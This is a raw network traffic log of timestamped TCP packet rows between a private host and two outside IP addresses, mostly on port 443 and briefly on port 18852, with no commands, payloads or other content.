Dec 29, 2024 11:18:21.429294109 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.437227964 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.437252998 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.437342882 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.437372923 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.437417030 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.444946051 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.444966078 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.445055962 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.445085049 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.445127010 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.453035116 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.453058004 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.453149080 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.453180075 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.453224897 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.460189104 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.460206032 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.460292101 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.460320950 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.460362911 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.468430996 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.468451977 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.468501091 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.468528032 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.468543053 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.468565941 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.615019083 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.615053892 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.615187883 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.615242958 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.615288973 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.623001099 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.623019934 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.623106003 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.623140097 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.623179913 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.630170107 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.630192995 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.630256891 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.630285025 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.630323887 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.638400078 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.638417959 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.638477087 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.638501883 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.638545990 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.646034956 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.646056890 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.646187067 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.646215916 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.646260977 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.654258966 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.654278040 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.654337883 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.654345989 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.654380083 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.654397964 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.662435055 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.662451029 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.662508965 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.662517071 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.662549973 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.662576914 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.669459105 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.669500113 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.669529915 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.669538021 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.669563055 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.669580936 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.816601038 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.816653967 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.816677094 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.816714048 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.816730976 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.816759109 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.824742079 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.824764013 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.824824095 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.824843884 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.824860096 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.824879885 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.831876040 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.831896067 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.831952095 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.831968069 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.832010984 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.840140104 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.840159893 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.840198994 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.840223074 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.840243101 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.840269089 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.847717047 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.847733974 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.847784996 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.847812891 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.847986937 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.855842113 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.855859041 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.855916977 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.855942965 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.855982065 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.864057064 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.864078045 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.864156008 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.864183903 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.864219904 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.871229887 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.871247053 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.871304989 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:21.871340990 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:21.871403933 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.023519039 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.023545027 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.023674965 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.023705959 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.023751974 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.029776096 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.029793978 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.029869080 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.029897928 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.029942036 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.034682035 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.034702063 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.034780979 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.034806013 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.034848928 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.043126106 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.043142080 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.043227911 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.043247938 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.043296099 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.050513029 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.050528049 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.050616026 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.050643921 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.050687075 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.060251951 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.060271025 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.060344934 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.060372114 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.060414076 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.068535089 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.068556070 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.068645954 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.068681955 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.068720102 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.075905085 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.075922012 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.076025963 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.076060057 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.076095104 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.220844984 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.220884085 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.220931053 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.220966101 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.220982075 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.221009016 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.228857994 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.228878021 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.228954077 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.228972912 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.229013920 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.237046957 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.237063885 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.237158060 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.237185001 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.237234116 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.244388103 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.244402885 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.244491100 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.244519949 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.244564056 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.251873016 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.251892090 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.251974106 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.252001047 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.252043009 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.260024071 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.260040045 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.260106087 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.260130882 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.260171890 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.268163919 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.268179893 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.268258095 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.268285990 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.268326998 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.276369095 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.276386023 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.276467085 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.276494026 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.276531935 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.422043085 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.422101021 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.422173023 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.422192097 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.422254086 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.430033922 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.430054903 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.430152893 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.430162907 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.430201054 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.438281059 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.438299894 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.438400030 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.438406944 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.438443899 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.445413113 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.445430994 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.445528984 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.445534945 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.445573092 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.454137087 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.454157114 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.454294920 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.454303026 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.454346895 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.461198092 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.461216927 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.461323977 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.461329937 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.461373091 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.469465971 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.469484091 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.469566107 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.469573975 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.469611883 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.616972923 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.617002010 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.617048025 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.617077112 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.617094994 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.617114067 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.623192072 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.623223066 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.623255968 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.623262882 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.623322964 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.623332024 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.631345987 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.631376982 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.631418943 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.631427050 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.631475925 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.639640093 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.639679909 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.639734983 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.639746904 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.639878988 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.646665096 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.646689892 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.646739006 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.646748066 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.646790028 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.655384064 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.655404091 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.655508995 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.655522108 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.655565023 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.661139011 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.661230087 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.661243916 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.661283970 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.661289930 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.661334991 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.661338091 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.661350965 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.661365032 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.661390066 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.661631107 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.661643028 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.661654949 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.661667109 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.661701918 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.662631035 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.662647963 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.662720919 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.662731886 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.662770987 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.670841932 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.670860052 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.670952082 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.670974970 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.671010017 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.780752897 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.780772924 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.780833960 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.817914009 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.817939997 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.818005085 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.818042040 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.818058014 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.818078041 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.825196981 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.825213909 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.825282097 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.825313091 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.825354099 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.832377911 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.832395077 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.832459927 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.832488060 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.832525015 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.840612888 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.840630054 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.840698957 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.840725899 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.840770006 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.848709106 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.848727942 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.848783970 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.848818064 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.848834991 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.848856926 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.856367111 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.856394053 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.856431007 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.856451988 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.856468916 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.856483936 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.864587069 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.864609003 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.864685059 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.864721060 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.864761114 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.871762037 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.871778011 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.871844053 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.871869087 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:22.871949911 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:22.872283936 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.872389078 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.872437954 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.876526117 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.876538992 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.876589060 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.884949923 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.885004997 CET	18852	49710	118.107.44.219	192.168.2.7
